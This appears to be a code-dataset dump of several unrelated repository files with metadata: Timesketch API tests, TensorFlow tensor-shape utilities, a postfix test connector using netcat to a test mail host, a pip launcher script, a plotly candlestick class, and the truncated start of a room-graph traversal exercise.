        """Authenticated request to query the datastore."""
        self.login()
        response = self.client.get(self.resource_url + '?q=test&filter={}')
        self.assertDictEqual(response.json, self.expected_response)
        self.assert200(response)
class EventResourceTest(BaseTest):
    """Test EventResource."""
    # REST endpoint under test.
    resource_url = '/api/v1/sketches/1/event/'

    # Canned event payload the mocked datastore returns for a valid lookup.
    expected_response = {
        u'meta': {
            u'comments': []
        },
        u'objects': {
            u'timestamp_desc': u'',
            u'timestamp': 1410895419859714,
            u'label': u'',
            u'source_long': u'',
            u'source_short': u'',
            u'es_index': u'',
            u'es_id': u'',
            u'message': u'',
            u'datetime': u'2014-09-16T19:23:40+00:00'
        }
    }

    @mock.patch(
        'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
    def test_get_event(self):
        """Authenticated request to get an event from the datastore."""
        self.login()
        response = self.client.get(
            self.resource_url + '?searchindex_id=test&event_id=test')
        self.assertDictEqual(response.json, self.expected_response)
        self.assert200(response)

    @mock.patch(
        'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
    def test_invalid_index(self):
        """
        Authenticated request to get an event from the datastore, but in the
        wrong index.
        """
        self.login()
        # The sketch has no search index named 'wrong_index'; expect 400.
        response_400 = self.client.get(
            self.resource_url + '?searchindex_id=wrong_index&event_id=test')
        self.assert400(response_400)
class EventAnnotationResourceTest(BaseTest):
    """Test EventAnnotationResource."""
    # REST endpoint under test.
    resource_url = '/api/v1/sketches/1/event/annotate/'

    @mock.patch(
        'timesketch.api.v1.resources.ElasticSearchDataStore', MockDataStore)
    def test_post_annotate_resource(self):
        """Authenticated request to create an annotation."""
        self.login()
        # Both supported annotation types must create successfully.
        for annotation_type in ['comment', 'label']:
            data = dict(
                annotation='test', annotation_type=annotation_type,
                event_id='test', searchindex_id='test')
            response = self.client.post(
                self.resource_url, data=json.dumps(data),
                content_type='application/json')
            self.assertIsInstance(response.json, dict)
            self.assertEquals(response.status_code, HTTP_STATUS_CODE_CREATED)

    def test_post_annotate_invalid_index_resource(self):
        """
        Authenticated request to create an annotation, but in the wrong index.
        """
        self.login()
        data = dict(
            annotation='test', annotation_type='comment',
            event_id='test', searchindex_id='invalid_searchindex')
        response = self.client.post(
            self.resource_url, data=json.dumps(data),
            content_type='application/json')
        # Annotating an index the sketch does not own must answer 400.
        self.assertEquals(response.status_code, HTTP_STATUS_CODE_BAD_REQUEST)
| [
"jberggren@gmail.com"
] | jberggren@gmail.com |
efb59884fa26538f68333a779cc23eb0241e6598 | 4ce2cff60ddbb9a3b6fc2850187c86f866091b13 | /tfrecords/src/wai/tfrecords/object_detection/utils/shape_utils.py | 8668796fc3a315e45922dc328d7c4ad147799896 | [
"MIT",
"Apache-2.0"
] | permissive | 8176135/tensorflow | 18cb8a0432ab2a0ea5bacd03309e647f39cb9dd0 | 2c3b4b1d66a80537f3e277d75ec1d4b43e894bf1 | refs/heads/master | 2020-11-26T05:00:56.213093 | 2019-12-19T08:13:44 | 2019-12-19T08:13:44 | 228,970,478 | 0 | 0 | null | 2019-12-19T03:51:38 | 2019-12-19T03:51:37 | null | UTF-8 | Python | false | false | 16,848 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utils used to manipulate tensor shapes."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import zip
import tensorflow as tf
from wai.tfrecords.object_detection.utils import static_shape
# Convenience re-export so callers of this module can resolve a dimension to
# a plain int without importing static_shape themselves.
get_dim_as_int = static_shape.get_dim_as_int
def _is_tensor(t):
  """Report whether `t` is one of TensorFlow's tensor-like types.

  Args:
    t: any object.

  Returns:
    True iff `t` is a tf.Tensor, tf.SparseTensor or tf.Variable.
  """
  tensor_types = (tf.Tensor, tf.SparseTensor, tf.Variable)
  return isinstance(t, tensor_types)
def _set_dim_0(t, d0):
  """Statically fix the size of `t`'s leading dimension to `d0`.

  Args:
    t: a tensor of rank at least 1.
    d0: integer size to record for dimension 0.

  Returns:
    `t`, with its static shape information updated in place.
  """
  new_shape = [d0] + t.get_shape().as_list()[1:]
  t.set_shape(new_shape)
  return t
def pad_tensor(t, length):
  """Pads the input tensor with 0s along the first dimension up to the length.

  Args:
    t: the input tensor, assuming the rank is at least 1.
    length: a tensor of shape [1] or an integer, indicating the first dimension
      of the input tensor t after padding, assuming length >= t.shape[0].

  Returns:
    padded_t: the padded tensor, whose first dimension is length. If the length
      is an integer, the first dimension of padded_t is set to length
      statically.
  """
  t_rank = tf.rank(t)
  t_shape = tf.shape(t)
  t_d0 = t_shape[0]
  # Number of zero rows to append along dimension 0.
  pad_d0 = tf.expand_dims(length - t_d0, 0)
  # For rank > 1 the zero block keeps the trailing dimensions of `t`; for
  # rank 1 it is simply a vector of `length - t_d0` zeros.
  pad_shape = tf.cond(
      tf.greater(t_rank, 1), lambda: tf.concat([pad_d0, t_shape[1:]], 0),
      lambda: tf.expand_dims(length - t_d0, 0))
  padded_t = tf.concat([t, tf.zeros(pad_shape, dtype=t.dtype)], 0)
  if not _is_tensor(length):
    # `length` is a python int, so the leading dimension can be fixed
    # statically for downstream shape inference.
    padded_t = _set_dim_0(padded_t, length)
  return padded_t
def clip_tensor(t, length):
  """Keep only the first `length` entries of `t` along dimension 0.

  Args:
    t: a tensor of rank at least 1.
    length: a scalar tensor or python integer, with length <= t.shape[0].

  Returns:
    The clipped tensor; when `length` is a python int the result's leading
    dimension is additionally set statically.
  """
  keep_indices = tf.range(length)
  clipped_t = tf.gather(t, keep_indices)
  if not _is_tensor(length):
    clipped_t = _set_dim_0(clipped_t, length)
  return clipped_t
def pad_or_clip_tensor(t, length):
  """Zero-pad or clip `t` so its first dimension equals `length`.

  Args:
    t: a tensor of rank at least 1.
    length: a scalar tensor or python integer giving the target size of
      dimension 0.

  Returns:
    The processed tensor; when `length` is a python int the leading
    dimension is also set statically.
  """
  target_shape = [length] + t.shape.as_list()[1:]
  return pad_or_clip_nd(t, target_shape)
def pad_or_clip_nd(tensor, output_shape):
  """Pad or Clip given tensor to the output shape.

  Args:
    tensor: Input tensor to pad or clip.
    output_shape: A list of integers / scalar tensors (or None for dynamic dim)
      representing the size to pad or clip each dimension of the input tensor.

  Returns:
    Input tensor padded and clipped to the output shape.
  """
  tensor_shape = tf.shape(tensor)
  # Per dimension: the target size when the tensor is larger (clip), or -1
  # (tf.slice's "take everything") when it is smaller or unconstrained.
  clip_size = [
      tf.where(tensor_shape[i] - shape > 0, shape, -1)
      if shape is not None else -1 for i, shape in enumerate(output_shape)
  ]
  clipped_tensor = tf.slice(
      tensor,
      begin=tf.zeros(len(clip_size), dtype=tf.int32),
      size=clip_size)

  # Pad tensor if the shape of clipped tensor is smaller than the expected
  # shape.
  clipped_tensor_shape = tf.shape(clipped_tensor)
  trailing_paddings = [
      shape - clipped_tensor_shape[i] if shape is not None else 0
      for i, shape in enumerate(output_shape)
  ]
  # Paddings are [before, after] per dimension; zeros are only appended.
  paddings = tf.stack(
      [
          tf.zeros(len(trailing_paddings), dtype=tf.int32),
          trailing_paddings
      ],
      axis=1)
  padded_tensor = tf.pad(clipped_tensor, paddings=paddings)
  # Record whatever static sizes were requested (tensors become None).
  output_static_shape = [
      dim if not isinstance(dim, tf.Tensor) else None for dim in output_shape
  ]
  padded_tensor.set_shape(output_static_shape)
  return padded_tensor
def combined_static_and_dynamic_shape(tensor):
  """Return the tensor's shape, preferring static sizes where known.

  Each entry is a python int when the dimension is statically known and a
  scalar tensor otherwise, which lets reshape operations preserve static
  shape information.

  Args:
    tensor: a tensor of any type.

  Returns:
    A list of length tensor.shape.ndims mixing ints and scalar tensors.
  """
  static_shape = tensor.shape.as_list()
  dynamic_shape = tf.shape(tensor)
  return [static_dim if static_dim is not None else dynamic_shape[index]
          for index, static_dim in enumerate(static_shape)]
def static_or_dynamic_map_fn(fn, elems, dtype=None,
                             parallel_iterations=32, back_prop=True):
  """Runs map_fn as a (static) for loop when possible.

  This function rewrites the map_fn as an explicit unstack input -> for loop
  over function calls -> stack result combination. This allows our graphs to
  be acyclic when the batch size is static.
  For comparison, see https://www.tensorflow.org/api_docs/python/tf/map_fn.

  Note that `static_or_dynamic_map_fn` currently is not *fully* interchangeable
  with the default tf.map_fn function as it does not accept nested inputs (only
  Tensors or lists of Tensors).  Likewise, the output of `fn` can only be a
  Tensor or list of Tensors.

  TODO(jonathanhuang): make this function fully interchangeable with tf.map_fn.

  Args:
    fn: The callable to be performed. It accepts one argument, which will have
      the same structure as elems. Its output must have the
      same structure as elems.
    elems: A tensor or list of tensors, each of which will
      be unpacked along their first dimension. The sequence of the
      resulting slices will be applied to fn.
    dtype:  (optional) The output type(s) of fn. If fn returns a structure of
      Tensors differing from the structure of elems, then dtype is not optional
      and must have the same structure as the output of fn.
    parallel_iterations: (optional) number of batch items to process in
      parallel.  This flag is only used if the native tf.map_fn is used
      and defaults to 32 instead of 10 (unlike the standard tf.map_fn default).
    back_prop: (optional) True enables support for back propagation.
      This flag is only used if the native tf.map_fn is used.

  Returns:
    A tensor or sequence of tensors. Each tensor packs the
    results of applying fn to tensors unpacked from elems along the first
    dimension, from first to last.
  Raises:
    ValueError: if `elems` a Tensor or a list of Tensors.
    ValueError: if `fn` does not return a Tensor or list of Tensors
  """
  if isinstance(elems, list):
    for elem in elems:
      if not isinstance(elem, tf.Tensor):
        raise ValueError('`elems` must be a Tensor or list of Tensors.')

    elem_shapes = [elem.shape.as_list() for elem in elems]
    # Fall back on tf.map_fn if shapes of each entry of `elems` are None or fail
    # to all be the same size along the batch dimension.
    for elem_shape in elem_shapes:
      if (not elem_shape or not elem_shape[0]
          or elem_shape[0] != elem_shapes[0][0]):
        return tf.map_fn(fn, elems, dtype, parallel_iterations, back_prop)
    # Static batch size: unroll into an explicit python loop over slices.
    arg_tuples = zip(*[tf.unstack(elem) for elem in elems])
    outputs = [fn(arg_tuple) for arg_tuple in arg_tuples]
  else:
    if not isinstance(elems, tf.Tensor):
      raise ValueError('`elems` must be a Tensor or list of Tensors.')
    elems_shape = elems.shape.as_list()
    if not elems_shape or not elems_shape[0]:
      return tf.map_fn(fn, elems, dtype, parallel_iterations, back_prop)
    outputs = [fn(arg) for arg in tf.unstack(elems)]
  # Stack `outputs`, which is a list of Tensors or list of lists of Tensors
  if all([isinstance(output, tf.Tensor) for output in outputs]):
    return tf.stack(outputs)
  else:
    if all([isinstance(output, list) for output in outputs]):
      if all([all(
          [isinstance(entry, tf.Tensor) for entry in output_list])
              for output_list in outputs]):
        # fn returned lists: stack position-wise across the batch.
        return [tf.stack(output_tuple) for output_tuple in zip(*outputs)]
  raise ValueError('`fn` should return a Tensor or a list of Tensors.')
def check_min_image_dim(min_dim, image_tensor):
  """Checks that the image width/height are greater than some number.

  This function is used to check that the width and height of an image are above
  a certain value. If the image shape is static, this function will perform the
  check at graph construction time. Otherwise, if the image shape varies, an
  Assertion control dependency will be added to the graph.

  Args:
    min_dim: The minimum number of pixels along the width and height of the
             image.
    image_tensor: The image tensor to check size for; dimensions 1 and 2 are
             treated as height and width respectively.

  Returns:
    If `image_tensor` has dynamic size, return `image_tensor` with a Assert
    control dependency. Otherwise returns image_tensor.

  Raises:
    ValueError: if `image_tensor`'s' width or height is smaller than `min_dim`.
  """
  image_shape = image_tensor.get_shape()
  image_height = static_shape.get_height(image_shape)
  image_width = static_shape.get_width(image_shape)
  if image_height is None or image_width is None:
    # Shape is dynamic: defer the check to graph execution time.
    shape_assert = tf.Assert(
        tf.logical_and(tf.greater_equal(tf.shape(image_tensor)[1], min_dim),
                       tf.greater_equal(tf.shape(image_tensor)[2], min_dim)),
        ['image size must be >= {} in both height and width.'.format(min_dim)])
    with tf.control_dependencies([shape_assert]):
      # tf.identity carries the control dependency to downstream consumers.
      return tf.identity(image_tensor)

  if image_height < min_dim or image_width < min_dim:
    raise ValueError(
        'image size must be >= %d in both height and width; image dim = %d,%d' %
        (min_dim, image_height, image_width))
  return image_tensor
def assert_shape_equal(shape_a, shape_b):
  """Assert that two shapes match, statically when possible.

  When both shapes are fully static the comparison happens at graph
  construction time and a ValueError is raised on mismatch; otherwise a
  runtime tf.assert_equal op is returned.

  Args:
    shape_a: a list containing shape of the first tensor.
    shape_b: a list containing shape of the second tensor.

  Returns:
    tf.no_op() when both shapes are static and equal, otherwise a
    tf.assert_equal() op.

  Raises:
    ValueError: When shapes are both static and unequal.
  """
  fully_static = (all(isinstance(dim, int) for dim in shape_a)
                  and all(isinstance(dim, int) for dim in shape_b))
  if not fully_static:
    return tf.assert_equal(shape_a, shape_b)
  if shape_a != shape_b:
    raise ValueError('Unequal shapes {}, {}'.format(shape_a, shape_b))
  return tf.no_op()
def assert_shape_equal_along_first_dimension(shape_a, shape_b):
  """Assert that two shapes agree on dimension 0, statically when possible.

  When both leading dimensions are static ints the comparison happens at
  graph construction time and a ValueError is raised on mismatch; otherwise
  a runtime tf.assert_equal op is returned.

  Args:
    shape_a: a list containing shape of the first tensor.
    shape_b: a list containing shape of the second tensor.

  Returns:
    tf.no_op() when both leading dimensions are static and equal, otherwise
    a tf.assert_equal() op.

  Raises:
    ValueError: When both leading dimensions are static and unequal.
  """
  dim_a = shape_a[0]
  dim_b = shape_b[0]
  if isinstance(dim_a, int) and isinstance(dim_b, int):
    if dim_a != dim_b:
      raise ValueError('Unequal first dimension {}, {}'.format(dim_a, dim_b))
    return tf.no_op()
  return tf.assert_equal(dim_a, dim_b)
def assert_box_normalized(boxes, maximum_normalized_coordinate=1.1):
  """Build an op asserting every coordinate in `boxes` is normalized.

  Args:
    boxes: a tensor of shape [N, 4] where N is the number of boxes.
    maximum_normalized_coordinate: largest value still treated as
      normalized; defaults to 1.1 to leave headroom for rounding.

  Returns:
    A tf.Assert op that fails at run time when any coordinate lies outside
    [0, maximum_normalized_coordinate].
  """
  smallest = tf.reduce_min(boxes)
  largest = tf.reduce_max(boxes)
  in_range = tf.logical_and(
      tf.less_equal(largest, maximum_normalized_coordinate),
      tf.greater_equal(smallest, 0))
  return tf.Assert(in_range, [boxes])
def flatten_dimensions(inputs, first, last):
  """Flattens `K-d` tensor along [first, last) dimensions.

  Converts `inputs` with shape [D0, D1, ..., D(K-1)] into a tensor of shape
  [D0, D1, ..., D(first) * D(first+1) * ... * D(last-1), D(last), ..., D(K-1)].

  Example:
  `inputs` is a tensor with initial shape [10, 5, 20, 20, 3].
  new_tensor = flatten_dimensions(inputs, last=4, first=2)
  new_tensor.shape -> [10, 100, 20, 3].

  Args:
    inputs: a tensor with shape [D0, D1, ..., D(K-1)].
    first: first value for the range of dimensions to flatten.
    last: last value for the range of dimensions to flatten. Note that the last
      dimension itself is excluded.

  Returns:
    a tensor with shape
    [D0, D1, ..., D(first) * D(first + 1) * ... * D(last - 1), D(last), ...,
     D(K-1)].

  Raises:
    ValueError: if first and last arguments are incorrect.
  """
  if first >= inputs.shape.ndims or last > inputs.shape.ndims:
    raise ValueError('`first` and `last` must be less than inputs.shape.ndims. '
                     'found {} and {} respectively while ndims is {}'.format(
                         first, last, inputs.shape.ndims))
  # Mixed static/dynamic shape keeps static sizes through the reshape.
  shape = combined_static_and_dynamic_shape(inputs)
  # Product of the sizes in [first, last) becomes the single merged dim.
  flattened_dim_prod = tf.reduce_prod(shape[first:last],
                                      keepdims=True)
  new_shape = tf.concat([shape[:first], flattened_dim_prod,
                         shape[last:]], axis=0)
  return tf.reshape(inputs, new_shape)
def flatten_first_n_dimensions(inputs, n):
  """Flattens `K-d` tensor along first n dimension to be a `(K-n+1)-d` tensor.

  Converts `inputs` with shape [D0, D1, ..., D(K-1)] into a tensor of shape
  [D0 * D1 * ... * D(n-1), D(n), ... D(K-1)].

  Example:
  `inputs` is a tensor with initial shape [10, 5, 20, 20, 3].
  new_tensor = flatten_first_n_dimensions(inputs, 2)
  new_tensor.shape -> [50, 20, 20, 3].

  Args:
    inputs: a tensor with shape [D0, D1, ..., D(K-1)].
    n: The number of dimensions to flatten.

  Returns:
    a tensor with shape [D0 * D1 * ... * D(n-1), D(n), ... D(K-1)].
  """
  # Thin wrapper: merge dimensions [0, n) into one leading dimension.
  return flatten_dimensions(inputs, first=0, last=n)
def expand_first_dimension(inputs, dims):
  """Expands `K-d` tensor along first dimension to be a `(K+n-1)-d` tensor.

  Converts `inputs` with shape [D0, D1, ..., D(K-1)] into a tensor of shape
  [dims[0], dims[1], ..., dims[-1], D1, ..., D(k-1)].

  Example:
  `inputs` is a tensor with shape [50, 20, 20, 3].
  new_tensor = expand_first_dimension(inputs, [10, 5]).
  new_tensor.shape -> [10, 5, 20, 20, 3].

  Args:
    inputs: a tensor with shape [D0, D1, ..., D(K-1)].
    dims: List with new dimensions to expand first axis into. The length of
      `dims` is typically 2 or larger; their product must equal D0.

  Returns:
    a tensor with shape [dims[0], dims[1], ..., dims[-1], D1, ..., D(k-1)].
  """
  inputs_shape = combined_static_and_dynamic_shape(inputs)
  expanded_shape = tf.stack(dims + inputs_shape[1:])

  # Verify that it is possible to expand the first axis of inputs.
  assert_op = tf.assert_equal(
      inputs_shape[0], tf.reduce_prod(tf.stack(dims)),
      message=('First dimension of `inputs` cannot be expanded into provided '
               '`dims`'))

  # The control dependency makes the reshape fail loudly (at run time) when
  # prod(dims) does not match the leading dimension.
  with tf.control_dependencies([assert_op]):
    inputs_reshaped = tf.reshape(inputs, expanded_shape)

  return inputs_reshaped
| [
"coreytsterling@gmail.com"
] | coreytsterling@gmail.com |
7092c7986651958a2883bb51380909307aebb640 | 10d89f178dc2e0f594c29c76aeef931c9525fbfd | /tests/.stage3_nonssl/verify_client.d/connector.py | 6629e2ada72684fa53ee0ef3791acf9a5f78acaf | [] | no_license | exphost/exphost.postfix | 7398bc629f02f5d8863535f3752e62a3214d0bb0 | abc770f66422b9bffc6b2223c6356cc846047065 | refs/heads/master | 2023-05-14T08:01:20.293965 | 2021-06-05T07:47:35 | 2021-06-05T08:09:58 | 365,591,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | connector = "nc test.some.example.domain.xyz 25"
def setup_connector(host):
host.ansible(
"command",
"yum install -y nc",
become=True,
check=False,
)
| [
"torgiren@gmail.com"
] | torgiren@gmail.com |
543dd5665279a756c3a9926a77d1086c88ba932d | 379beb6e4ad6f6383615d7eff0bc1b126712cd84 | /venv/bin/pip | 199c858bdc6fa52f707f4580b10a6422e736f50e | [] | no_license | chris-baby/bwonline | 3eb9b372d825eab9cafa39121f254a53ce77298d | cca278a066c0a8beda95db87515ad2ed57d5e43d | refs/heads/master | 2022-08-22T07:52:57.238431 | 2020-05-28T04:31:42 | 2020-05-28T04:31:42 | 267,493,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | #!/Users/tongtong/PycharmProjects/django/bw_online/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"918128078@qq.com"
] | 918128078@qq.com | |
cd3fb7b1c5af5ec78d27e4e22f214c209953131b | 090a4e026addc9e78ed6118f09fd0d7d4d517857 | /graph_objs/candlestick/_decreasing.py | a63b2f5acb3f6c6939a7777ea542936faf4e0bab | [
"MIT"
] | permissive | wwwidonja/new_plotly | 0777365e53ea7d4b661880f1aa7859de19ed9b9a | 1bda35a438539a97c84a3ab3952e95e8848467bd | refs/heads/master | 2023-06-04T19:09:18.993538 | 2021-06-10T18:33:28 | 2021-06-10T18:33:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,701 | py | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Decreasing(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "candlestick"
_path_str = "candlestick.decreasing"
_valid_props = {"fillcolor", "line"}
# fillcolor
# ---------
@property
def fillcolor(self):
"""
Sets the fill color. Defaults to a half-transparent variant of
the line color, marker color, or marker line color, whichever
is available.
The 'fillcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["fillcolor"]
@fillcolor.setter
def fillcolor(self, val):
self["fillcolor"] = val
# line
# ----
@property
def line(self):
"""
The 'line' property is an instance of Line
that may be specified as:
- An instance of :class:`new_plotly.graph_objs.candlestick.decreasing.Line`
- A dict of string/value properties that will be passed
to the Line constructor
Supported dict properties:
color
Sets the color of line bounding the box(es).
width
Sets the width (in px) of line bounding the
box(es).
Returns
-------
new_plotly.graph_objs.candlestick.decreasing.Line
"""
return self["line"]
@line.setter
def line(self, val):
self["line"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
fillcolor
Sets the fill color. Defaults to a half-transparent
variant of the line color, marker color, or marker line
color, whichever is available.
line
:class:`new_plotly.graph_objects.candlestick.decreasing.Lin
e` instance or dict with compatible properties
"""
def __init__(self, arg=None, fillcolor=None, line=None, **kwargs):
"""
Construct a new Decreasing object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`new_plotly.graph_objs.candlestick.Decreasing`
fillcolor
Sets the fill color. Defaults to a half-transparent
variant of the line color, marker color, or marker line
color, whichever is available.
line
:class:`new_plotly.graph_objects.candlestick.decreasing.Lin
e` instance or dict with compatible properties
Returns
-------
Decreasing
"""
super(Decreasing, self).__init__("decreasing")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the new_plotly.graph_objs.candlestick.Decreasing
constructor must be a dict or
an instance of :class:`new_plotly.graph_objs.candlestick.Decreasing`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("fillcolor", None)
_v = fillcolor if fillcolor is not None else _v
if _v is not None:
self["fillcolor"] = _v
_v = arg.pop("line", None)
_v = line if line is not None else _v
if _v is not None:
self["line"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| [
"wwwidonja@gmail.com"
] | wwwidonja@gmail.com |
71a4afa1dc2fd6e0f3aae9e30afd214e671ad0c6 | 5bfd77438d2de22d917bc0b103622a5c59a96377 | /graph_adventure/adv2.py | b584f33e5bb7e72956cf52b9e70f1bc2cf68f85a | [] | no_license | ticotheps/Sprint-Challenge--Graphs | 5cf8b4c3375237869ef962d806db77bc82161837 | 27c31691787572d02d288110e226abef9f44d1b6 | refs/heads/master | 2020-09-29T11:34:56.152170 | 2019-07-21T19:06:10 | 2019-07-21T19:06:10 | 192,962,364 | 0 | 1 | null | 2019-07-21T19:06:11 | 2019-06-20T17:35:16 | Python | UTF-8 | Python | false | false | 29,550 | py | from room import Room
from player import Player
from world import World
import random
# Load world
world = World()
# You may uncomment the smaller graphs for development and testing purposes.
# roomGraph={0: [(3, 5), {'n': 1}], 1: [(3, 6), {'s': 0, 'n': 2}], 2: [(3, 7), {'s': 1}]}
roomGraph={0: [(3, 5), {'n': 1, 's': 5, 'e': 3, 'w': 7}], 1: [(3, 6), {'s': 0, 'n': 2}], 2: [(3, 7), {'s': 1}], 3: [(4, 5), {'w': 0, 'e': 4}], 4: [(5, 5), {'w': 3}], 5: [(3, 4), {'n': 0, 's': 6}], 6: [(3, 3), {'n': 5}], 7: [(2, 5), {'w': 8, 'e': 0}], 8: [(1, 5), {'e': 7}]}
# roomGraph={0: [(3, 5), {'n': 1, 's': 5, 'e': 3, 'w': 7}], 1: [(3, 6), {'s': 0, 'n': 2}], 2: [(3, 7), {'s': 1}], 3: [(4, 5), {'w': 0, 'e': 4}], 4: [(5, 5), {'w': 3}], 5: [(3, 4), {'n': 0, 's': 6}], 6: [(3, 3), {'n': 5, 'w': 11}], 7: [(2, 5), {'w': 8, 'e': 0}], 8: [(1, 5), {'e': 7}], 9: [(1, 4), {'n': 8, 's': 10}], 10: [(1, 3), {'n': 9, 'e': 11}], 11: [(2, 3), {'w': 10, 'e': 6}]}
# roomGraph={0: [(3, 5), {'n': 1, 's': 5, 'e': 3, 'w': 7}], 1: [(3, 6), {'s': 0, 'n': 2, 'e': 12, 'w': 15}], 2: [(3, 7), {'s': 1}], 3: [(4, 5), {'w': 0, 'e': 4}], 4: [(5, 5), {'w': 3}], 5: [(3, 4), {'n': 0, 's': 6}], 6: [(3, 3), {'n': 5, 'w': 11}], 7: [(2, 5), {'w': 8, 'e': 0}], 8: [(1, 5), {'e': 7}], 9: [(1, 4), {'n': 8, 's': 10}], 10: [(1, 3), {'n': 9, 'e': 11}], 11: [(2, 3), {'w': 10, 'e': 6}], 12: [(4, 6), {'w': 1, 'e': 13}], 13: [(5, 6), {'w': 12, 'n': 14}], 14: [(5, 7), {'s': 13}], 15: [(2, 6), {'e': 1, 'w': 16}], 16: [(1, 6), {'n': 17, 'e': 15}], 17: [(1, 7), {'s': 16}]}
# roomGraph={494: [(1, 8), {'e': 457}], 492: [(1, 20), {'e': 400}], 493: [(2, 5), {'e': 478}], 457: [(2, 8), {'e': 355, 'w': 494}], 484: [(2, 9), {'n': 482}], 482: [(2, 10), {'s': 484, 'e': 404}], 486: [(2, 13), {'e': 462}], 479: [(2, 15), {'e': 418}], 465: [(2, 16), {'e': 368}], 414: [(2, 19), {'e': 365}], 400: [(2, 20), {'e': 399, 'w': 492}], 451: [(2, 21), {'e': 429}], 452: [(2, 22), {'e': 428}], 478: [(3, 5), {'e': 413, 'w': 493}], 393: [(3, 6), {'e': 375}], 437: [(3, 7), {'e': 347}], 355: [(3, 8), {'e': 312, 'w': 457}], 433: [(3, 9), {'e': 372}], 404: [(3, 10), {'n': 339, 'w': 482}], 339: [(3, 11), {'s': 404, 'e': 314}], 367: [(3, 12), {'n': 462, 'e': 344}], 462: [(3, 13), {'s': 367, 'w': 486}], 463: [(3, 14), {'e': 458, 'n': 418}], 418: [(3, 15), {'e': 349, 'w': 479}], 368: [(3, 16), {'n': 436, 'e': 284, 'w': 465}], 436: [(3, 17), {'s': 368}], 447: [(3, 18), {'n': 365}], 365: [(3, 19), {'s': 447, 'e': 333, 'w': 414}], 399: [(3, 20), {'e': 358, 'w': 400}], 429: [(3, 21), {'n': 428, 'w': 451}], 428: [(3, 22), {'s': 429, 'e': 411, 'w': 452}], 419: [(4, 4), {'n': 413}], 413: [(4, 5), {'n': 375, 's': 419, 'w': 478}], 375: [(4, 6), {'n': 347, 's': 413, 'w': 393}], 347: [(4, 7), {'n': 312, 's': 375, 'w': 437}], 312: [(4, 8), {'s': 347, 'e': 299, 'w': 355}], 372: [(4, 9), {'e': 263, 'w': 433}], 258: [(4, 10), {'e': 236}], 314: [(4, 11), {'e': 220, 'w': 339}], 344: [(4, 12), {'n': 359, 'e': 230, 'w': 367}], 359: [(4, 13), {'n': 458, 's': 344}], 458: [(4, 14), {'s': 359, 'w': 463}], 349: [(4, 15), {'n': 284, 'w': 418}], 284: [(4, 16), {'n': 470, 's': 349, 'e': 254, 'w': 368}], 470: [(4, 17), {'s': 284}], 301: [(4, 18), {'e': 187}], 333: [(4, 19), {'n': 358, 'e': 303, 'w': 365}], 358: [(4, 20), {'n': 397, 's': 333, 'w': 399}], 397: [(4, 